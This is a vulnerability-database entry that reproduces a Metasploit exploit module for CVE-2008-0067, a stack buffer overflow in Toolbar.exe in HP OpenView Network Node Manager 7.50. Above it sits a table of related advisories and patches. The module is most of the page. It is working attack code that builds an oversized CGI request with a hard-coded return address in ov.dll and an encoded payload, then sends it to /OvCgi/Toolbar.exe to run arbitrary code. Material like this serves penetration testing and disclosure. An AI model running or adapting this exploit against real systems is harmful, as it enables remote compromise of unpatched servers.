HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow

🗓️ 16 Jul 2011 00:00:00Reported by metasploitType

HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflo

Reporter	Title	Published	Views	Family All 32
0day.today	HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow	16 Jul 201100:00	–	zdt
Circl	CVE-2008-0067	9 May 201000:00	–	circl
Check Point Advisories	Preemptive Protection against HP OpenView Network Node Manager Buffer Overflows	9 Jan 200900:00	–	checkpoint_advisories
Check Point Advisories	HP OpenView Network Node Manager CGI programs HTTP Request Buffer Overflow (CVE-2007-6204; CVE-2008-0067)	6 Dec 200900:00	–	checkpoint_advisories
CVE	CVE-2008-0067	8 Jan 200919:00	–	cve
Cvelist	CVE-2008-0067	8 Jan 200919:00	–	cvelist
Exploit DB	HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)	9 May 201000:00	–	exploitdb
Tenable Nessus	HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22	15 Jun 200900:00	–	nessus
Tenable Nessus	HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22	15 Jun 200900:00	–	nessus
Tenable Nessus	HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13	10 May 201000:00	–	nessus

##
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
				By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
				arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13192 $',
			'References'     =>
				[
					[ 'CVE', '2008-0067' ],
					[ 'OSVDB', '53222' ],
					[ 'BID', '33147' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 650,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 7 2009'))

		register_options( [ Opt::RPORT(80) ], self.class )
	end

	def exploit

		sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded

		print_status("Trying target #{target.name}...")

		send_request_raw({
			'uri'		=> "/OvCgi/Toolbar.exe?" + sploit,
			'method'	=> "GET",
			}, 5)


		handler

	end

end

16 Jul 2011 00:00Current

1Low risk

Vulners AI Score1

CVSS 210

EPSS0.81949